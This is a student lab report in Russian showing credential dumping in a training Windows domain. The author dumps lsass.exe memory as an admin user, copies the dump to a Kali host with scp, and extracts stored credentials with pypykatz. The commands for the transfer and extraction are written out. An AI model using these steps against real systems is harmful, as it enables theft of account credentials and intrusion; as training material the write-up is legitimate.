# Windows_Basic-Фадеев_Александр-Практика-3 ## Часть 1. Анализ памяти Lsass.exe Зайдём под учетной записью Ольги и попробуем обратиться к ресурсам домена. ![](https://i.imgur.com/xRerkpc.png) Выйдим из учетной записи и зайдем под Petr Запустим командную строку от имени администратора Так как Petr не является администратором PC1, введем данные ADMPetr Введём команду whoami, чтобы проверить, кто мы ![](https://i.imgur.com/rTc8qmv.png) Запустим диспетчер задач от имени администратора ADMPetr Перейдем в раздел подробности и найдем lsass.exe Нажимаем ПКМ и создаем дамп файла. ![](https://i.imgur.com/cZ35Js2.png) Запускаем kali linux, включаем ssh для передачи файла. ![](https://i.imgur.com/WqNEEUq.png) Настроим статический ip адрес ![](https://i.imgur.com/aByV8ur.png) Вернёмся в Win10 и с помощью командной строки, запущенной от имени ADMPetr передадим файл на kali. Нужно подтвердить fingerprint (yes) ![](https://i.imgur.com/sCirLQA.png) Использованная команда: `scp C:\\Users\\ADMpetr\\AppData\\Local\\Temp\\lsass.DMP kali@192.168.10.122:/home/kali` Проверим, что на kali файл присутствует ![](https://i.imgur.com/VieiIPt.png) Переключимся в директорию с lsass и скачаем скрипт pypykatz ``` cd /home/kali git clone <https://github.com/skelsec/pypykatz ``` Перейдём в директорию pypycatz и выполним скрипт, применив его к скачанному ранее дампу ``` pypykatz lsa minidump lsass.DMP ``` ![](https://i.imgur.com/LZ2H9li.png) Увидим учетные данные, которые скрипт достал из процесса lsass